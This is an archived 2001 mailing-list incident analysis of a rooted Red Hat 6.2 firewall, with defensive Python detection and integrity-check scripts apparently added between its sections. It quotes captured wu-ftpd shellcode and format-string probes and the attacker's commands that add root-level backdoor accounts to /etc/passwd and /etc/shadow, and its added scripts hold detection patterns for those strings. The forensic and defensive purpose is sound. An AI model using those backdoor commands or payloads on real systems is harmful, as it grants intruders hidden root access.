Security Incidents mailing list archives

RedHat 6.2 box exploited - analysis of attacker activity


From: Curt Wilson <netw3 () NETW3 COM>
Date: Sun, 4 Feb 2001 06:56:45 -0000

Curt Wilson, Netw3 Consulting 02/02/2001

This is my first analysis of a Linux box that has been 
rooted. This is intended to be somewhat of a teaching 
document, and does not assume a large degree of 
technical skill. If anyone sees any errors in here or 
has any comments, I'd be happy to hear from you at 
netw3 () netw3 com

The box in question is an unpatched Red Hat Linux 
6.2 machine running as an ipchains firewall and IP 
masquerade server.

The attacker(s)' main goal in compromising the system 
seems to have been to set up a BNC server that allows 
connections to IRC networks, along with an IRC bot. 
The attacker also used the compromised Linux system 
to search for other vulnerable systems running the 
Washington University FTP server, using two exploits 
(wu-scan and muje), and to attempt or carry out 
exploits of numerous remote systems through the 
statdx exploit. The statdx exploit attacks the remote 
procedure call application rpc.statd and opens up an 
interactive root shell on TCP port 39168. (For more 
info on statdx, see the paper by George Bakos at 
http://www.sans.org/y2k/practical/George_Bakos.html.)

The intruder erased the log directory /var/log, which 
damaged numerous symlinks. A more careful attacker 
would have left the directory intact and edited the 
specific log files to erase their tracks. It is clear from 
the system analysis that this person is what’s known 
as a “script kiddie” and does not represent an 
advanced attacker.

The intruder appears to have penetrated the system 
using an exploit that attacks WU-FTP. The default 
wu-ftp on Red Hat 6.2 (wu-2.6.0(1) in this case) is 
vulnerable; exploit code has been published on the 
Internet and is in wide use amongst the cracker 
underground. Patches are available on the Red Hat 
website.

Buffer overflow attacks on wu-ftp take place through 
a specially crafted password sequence that includes 
the spawning of /bin/sh. The source IP addresses are 
most likely other compromised systems that the 
attackers are using to break into further sites, and 
one of them could be the site that was used to crack 
this box. Logs of attacks in progress:

211.72.123.250 => external_ip_of_linux_system [21]
LeLmNnNnUSER ftp
NBnPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

151.15.186.199 => external_ip_of_linux_system [21]
Xv+R6-6-
user ftp]-1pass 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a-
3-a-aSITE EXEC %x %x %x %x +%x |%x

156.111.178.186 => external_ip_of_linux_system [21]
EEUSER ftp
QPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

syr-24-95-165-70.twcny.rr.com => external_ip_of_linux_system [21]
q-q-q-q-USER ftp
q-%PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

211.250.5.4 => external_ip_of_linux_system [21]
FFUSER ftp
pPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

63.105.115.4 => external_ip_of_linux_system [21]
L'L'0$L)^1L)^1USER ftp
L)k1PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
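As an added example (not code from the original post), a small Python check in the style of a Snort rule that classifies FTP control-channel sessions like the captures above. The transcripts it scans are constructed from the patterns shown, and the detection names are my own labels:

```python
import re

# Constructed sample FTP control-channel transcripts, modelled on the
# sanitized captures quoted above. The capture tool dropped the non-printable
# shellcode bytes, which is why the PASS argument reads as line noise.
SAMPLE_SESSIONS = [
    "USER ftp\r\nPASS 111F11CA?k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11\r\n",
    "user ftp\r\npass 111F11CA?k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11\r\n"
    "SITE EXEC %x %x %x %x +%x |%x\r\n",
    "USER alice\r\nPASS hunter2\r\nCWD pub\r\nRETR README\r\n",
    "USER ftp\r\nPASS guest@example.org\r\nSITE EXEC ls -l\r\n",
]

# printf-style directives; several in one SITE EXEC argument is a format-string probe
FORMAT_SPEC = re.compile(r"%[0-9$]*[xXnpsdu]")
# "/bin/sh", "binsh", "bin0sh": the shell string embedded in the payload
SHELL_MARKER = re.compile(r"bin.{0,2}sh", re.IGNORECASE)

def classify_session(transcript):
    """Return the list of detection names that fire for one FTP session."""
    hits = []
    for line in transcript.splitlines():
        parts = line.strip().split(" ", 1)
        verb = parts[0].upper()
        arg = parts[1] if len(parts) > 1 else ""
        if verb == "PASS":
            # An anonymous-FTP password is an e-mail address; an overlong PASS
            # full of punctuation or carrying a shell marker is exploit payload.
            junk = sum(1 for c in arg if not (c.isalnum() or c in "@.-_+"))
            if SHELL_MARKER.search(arg) or (len(arg) > 32 and junk > 5):
                hits.append("wuftpd-shellcode-in-PASS")
        elif verb == "SITE" and arg.upper().startswith("EXEC"):
            # Two or more %x/%n directives after SITE EXEC match the probe seen
            # in the second capture above (the wu-ftpd bug RHSA-2000-039 fixes).
            if len(FORMAT_SPEC.findall(arg)) >= 2:
                hits.append("wuftpd-site-exec-format-string")
    return hits

def scan(sessions):
    """Classify every session; returns one list of hits per session."""
    return [classify_session(s) for s in sessions]
```

Feeding real sessions in requires reassembling the FTP control stream first; the check above only looks at one command per line.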

The wu-ftp exploit probably allowed the attacker to 
bind /bin/sh to a TCP port. The attacker then telnets 
to that port and has interactive root access. Another 
method is that the exploit allows the execution of 
arbitrary code, such as appending a username to the 
/etc/passwd and /etc/shadow files, which is then used 
to log in through the telnet port. Without detailed 
logs it’s hard to know exactly what the attacker did, 
since they cleaned up some other commonly exploited 
services when they first logged in to the system. It’s 
possible that the attacker gained initial access by 
some other means, but the evidence suggests that 
these FTP exploits were the means. A Red Hat 
announcement about this problem can be found at 
http://www.redhat.com/support/errata/RHSA-2000-039.html

At some point, this attacker (or other attackers) 
placed a file at /bin/psr which appends a user 
named “rewt” with root level access and a user 
named “mujixi” to the /etc/passwd and /etc/shadow 
files:

echo "rewt:x:0:0:root user,,,:/root:/bin/bash" >>/etc/passwd
echo "mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow

After obtaining root access, attacker modified multiple 
system files and scripts to cover their tracks:

/etc/rc.d/rc.sysinit has been modified to run the 
following:

        /usr/sbin/sshd2
        /usr/sbin/gpm.root
        /usr/sbin/gpm.root

/usr/sbin/gpm.root appears to be controlled by a 
config file /etc/gpm-root.conf and contains the 
following commands:

cd /usr/X11R6/include/X11/…    

This directory is invisible to the standard ls 
command, but will show up with ls -a, which displays 
all files. This is a common attacker trick. Most of the 
attacker’s tools were placed in this directory.

./linsniffer > tcp.log &

linsniffer captures logins and passwords in an 
Ethernet environment. A switched network makes 
this attack more difficult.

/usr/sbin/sshd2 -p 1983

Attacker runs an SSH server on port 1983.

After exploiting the system for root access, the 
attacker appears to have added a username “muje1” 
to the /etc/passwd and/or /etc/shadow files with a 
group ID of 501. The attacker also edited the 
/etc/ftpusers file, perhaps allowing more users to log 
in through FTP than the original setting. Other 
suspicious user IDs include “muje”, and group IDs 
include 1018 and 1004.

Next, the attacker kills all instances of the lpd 
process. This is probably so others won’t exploit “his” 
system through an lpd buffer overflow (never mind 
that lpd was not an open port from the outside; the 
attacker wanted to secure his own access). The 
attacker also removed the portmapper startup file 
/etc/rc.d/init.d/portmap, which stopped the 
portmapper from listening on TCP port 111 (never 
mind that portmapper was not an open port from the 
outside either). The attacker then cleans up by 
running “updatedb”, removing a package named 
srk.tar.gz (which might be a rootkit), and removing 
the home directories of users muje and muje1. 

The attacker appears to have replaced various system 
binaries such as netstat, ps, ifconfig, and top to cover 
their tracks. The replaced version of ps does not 
show activity such as linsniffer, and the replaced 
version of ifconfig does not show the interface 
running in promiscuous mode. The other replaced 
binaries are most likely tailored to hide the attacker’s 
activities from administrators’ eyes. These 
replacements may have been done with srk.tar.gz. I 
was unable to find a published tool named “srk” but 
the “rk” suggests a rootkit. Please see 
http://packetstorm.securify.com/UNIX/penetration/rootkits/ 
for a large selection of rootkits.

The group ID 1018 appears to have run the rootkit. 
The system binaries that were replaced by this 
activity are as follows:

-rwxr-xr-x    1 1018     users       19840 Nov 25  1998 /sbin/ifconfig
-rwxr-xr-x    1 1018     users       33280 Dec 27  1998 /bin/ps
-rwxr-xr-x    1 1018     users       35300 Jan  2  1999 /bin/netstat
-rwxr-xr-x    1 1018     users       53588 Jan 12  1999 /usr/bin/top
-rwxr-xr-x    1 1018     users       13621 Dec 19 10:14 /bin/vobiscu (unfamiliar)
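An added triage script (not from the original post) covering two of the findings above: it hunts for dot-only directory names like the one the attacker created under /usr/X11R6/include/X11, and it audits an ls -l listing for system binaries not owned by root:root or owned by a bare numeric id such as 1018. The listing it parses is constructed from the entries shown, and the set of system path prefixes is an assumption:

```python
import os
import re
import tempfile

# Assumed set of directories whose contents should always be root:root.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")

# Directory names made only of dots and/or spaces ("...", ". ", ".. ") hide from a
# plain ls and are easy to skim past even in ls -a output.
ODD_NAME = re.compile(r"^[. ]+$")

def find_hidden_dirs(root):
    """Walk root and return directories whose names are dot/space-only.
    os.walk never yields the real "." and ".." entries, so they are not flagged."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        found.extend(os.path.join(dirpath, d) for d in dirnames if ODD_NAME.match(d))
    return sorted(found)

def audit_listing(ls_output, prefixes=SYSTEM_DIRS):
    """Parse `ls -l` lines and report files under the given prefixes that are not
    owned by root:root or that show a bare numeric uid/gid, which means the owning
    account has no /etc/passwd or /etc/group entry on this host."""
    findings = []
    for line in ls_output.splitlines():
        fields = line.split(None, 8)   # perms links owner group size mon day yr/time name
        if len(fields) < 9 or not fields[0].startswith(("-", "l")):
            continue
        owner, group, path = fields[2], fields[3], fields[8]
        if not path.startswith(prefixes):
            continue
        reasons = []
        if owner != "root" or group != "root":
            reasons.append("not root:root (%s:%s)" % (owner, group))
        if owner.isdigit() or group.isdigit():
            reasons.append("numeric owner: account missing from passwd/group")
        if reasons:
            findings.append((path, reasons))
    return findings

# Constructed listing modelled on the replaced binaries and key files shown above.
SAMPLE_LISTING = """\
-rwxr-xr-x    1 1018     users       19840 Nov 25  1998 /sbin/ifconfig
-rwxr-xr-x    1 1018     users       33280 Dec 27  1998 /bin/ps
-rwxr-xr-x    1 root     root        18256 Mar  7  2000 /bin/ls
-rw-------    1 root     501           512 Jan 28 20:41 /root/.ssh/random_seed
"""

def demo_hidden_dirs():
    """Build a throwaway tree containing a '...' directory and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "X11", "..."))
    os.makedirs(os.path.join(root, "X11", "bitmaps"))
    return [os.path.relpath(p, root) for p in find_hidden_dirs(root)]
```

On a live system run find_hidden_dirs over / and feed audit_listing the output of ls -l for each system directory; remember that a replaced ls may itself lie, so compare against a listing taken from clean media.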

The group ID 1004 created the following files of 
interest:

[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r--    1 root     501           117 Jan 13 21:01 /dev/caca

[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666

31337 is commonly used in the computer 
underground. Many Trojan horse applications listen 
on port 31337. It is a variation of the word “elite”. 666 
is used by attackers, and port 6666 may refer to an 
IRC or BNC server.

-rw-rw-r--    1 root     501            97 Jan 13 21:01 /dev/dsx

[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf 
3 slice
3 mech
3 muh
3 bnc

/dev/dsx appears to be a listing of what the attacker 
has installed.

-rw-rw-r--    1 root     501         12288 Jan 13 21:01 /etc/psdevtab

[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x    2 root     501          4096 Jan 24 00:17 .
drwxr-x---    8 root     root         4096 Feb  2 18:54 ..
-rw-------    1 root     root          663 Jan 28 20:41 known_hosts
-rw-------    1 root     501           512 Jan 28 20:41 random_seed

-rw-r--r--    1 1004     users         307 Aug 31  1998 /usr/man/man6/ssh_config
-rw-------    1 root     501           552 Jan 13 21:01 /usr/man/man6/ssh_host_key
-rw-rw-r--    1 root     501           356 Jan 13 21:01 /usr/man/man6/ssh_host_key.pub
-rw-------    1 root     501           512 Feb  3 04:55 /usr/man/man6/ssh_random_seed
-rw-r--r--    1 1004     users         697 Dec 27  1998 /usr/man/man6/sshd_config

/usr/man/man6 is also used by attacker(s) to store 
SSH key and configuration files.

The following ports are open and listening on the local 
(192.168) interface of the system:

21 ftp          # point of entry
22 ssh          # activated by attacker
23 telnet               
25 smtp
79 finger
98 linuxconf    
113 auth
513 rlogin
514 rsh 
515 lp
1983  ssh               # activated by attacker
  
The primary user that ran the BNC server appears to 
go by the name of “bulangia”, “buLaneL” or “bulanel”, 
and a secondary user goes by the name of “NINA16”. 
There is evidence of multiple connections to 
Bulgarian and Italian IRC networks and remote 
systems. Some of the hosts that used the BNC server 
include 5dial86.xnet.ro and 11dial217.xnet.ro. Various 
IRC servers were visited by these users, and if 
further action were warranted, investigations could 
take place by connecting to the same IRC networks 
and attempting to track these people down. 

Attacker(s) also installed what appears to be an IRC 
bot going by the name of “eddy” or “eddybot”. The 
software package used to implement this bot was 
emech-2.8, and the config file for e-mech reveals 
details such as an ircname of “H-a-c-k T-h-e 
F-u-c-k-i-n-g P-l-a-n-e-t !” and channels such 
as “#Linux_mafia”. The linkpass and entityname are 
present in the config and users file, which could allow 
counterintelligence to be performed if desired. 


Recommendations:

Apply patches to Red Hat systems running ipchains 
firewalls. Red Hat 6.2 has nearly 50 security patches. 
See http://www.redhat.com/support/errata/rh62-errata-security.html.

Several accounts and passwords were obtained 
through the use of the linsniffer application. A 
switched environment can help reduce the risk of 
sniffing attacks.

Lock down systems to provide “defense in depth”. Do 
not simply rely upon ipchains to block hostile traffic. 
Deny all traffic except what is specifically allowed. 
Comment out services in /etc/services that do not 
need to be run (finger, etc.) as well as in /etc/rc.d. If 
the FTP service will be used, make sure 
that /etc/ftpusers only allows specific usernames. If 
an attacker pierces the firewall mechanism, limit what 
is available by turning off everything that is not 
needed, leaving only those services that are truly 
necessary. 

Portsentry, which is running on the system, is a nice 
addition, but obviously did not help in this instance. 
Since the wu-ftp vulnerabilities are widely known, an 
attacker would only have to find TCP port 21 open 
with a banner that identified itself as a vulnerable 
version of wu-ftp. Using TCP wrappers and ipchains 
to restrict access to ftpd would be helpful. Modify the 
banners of listening services to present false 
information, to confuse attackers and automated 
exploit/scanning applications.

Systems management should never be performed 
over an unencrypted connection such as telnet. 
Install SSH on the server and on your client systems 
and use it. This encrypts connections and makes it 
much harder for an attacker to obtain your login 
credentials.

An intrusion detection system such as snort 
(www.snort.org) is inexpensive, easy to configure, 
and in wide use. Snort can monitor a network and 
alert a network manager (with the proper 
configuration) via pager or email that an attack is 
taking place. Tripwire is a file integrity monitor that 
can be used to take a snapshot of certain key system 
files (such as ps, netstat, ifconfig, and many more). 
When these key system files are changed, an alert 
can be generated to notify that something suspicious 
is taking place. There are freeware/GPL options for 
SSH (OpenSSH) and a freeware tripwire clone 
available on the Internet (see www.whitehats.com for 
a large collection of open source security tools).
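An added example (not from the original post, and not Tripwire itself) of the file-integrity baseline the recommendation describes: snapshot the hashes and ownership of the key binaries to a JSON file, then re-verify later. The demo() helper tampers with a throwaway file rather than a real binary:

```python
import hashlib
import json
import os
import tempfile

def fingerprint(path):
    """SHA-256 plus owner/mode/size for one path; None if it does not exist."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    h = hashlib.sha256()
    if os.path.isfile(path):
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
    return {"sha256": h.hexdigest(), "mode": oct(st.st_mode),
            "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size}

def snapshot(paths, dest):
    """Baseline paths such as /bin/ps and /sbin/ifconfig into a JSON file. Keep
    that file off-host or on read-only media: a rootkit that can replace ps can
    just as easily rewrite a baseline stored on the same disk."""
    baseline = {p: fingerprint(p) for p in paths}
    with open(dest, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)

def verify(baseline_file):
    """Re-fingerprint every baselined path; return {path: [what changed]}."""
    with open(baseline_file) as f:
        baseline = json.load(f)
    changes = {}
    for path, old in baseline.items():
        new = fingerprint(path)
        if (old is None) != (new is None):
            changes[path] = ["appeared" if old is None else "deleted"]
        elif old is not None and old != new:
            changes[path] = sorted(k for k in old if old[k] != new[k])
    return changes

def demo():
    """Baseline a throwaway file, tamper with it and re-verify (keyed by name)."""
    target = os.path.join(tempfile.mkdtemp(), "ps")
    with open(target, "wb") as f:
        f.write(b"original contents\n")   # stands in for a real binary
    snapshot([target], target + ".baseline.json")
    with open(target, "ab") as f:
        f.write(b"tampered\n")            # constructed modification
    return {os.path.basename(p): v for p, v in verify(target + ".baseline.json").items()}
```

Run snapshot() right after a clean install, before the host is exposed, and schedule verify() from a cron job whose output goes to another machine.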

Curt Wilson - Netw3 Consulting
netw3 () netw3 com

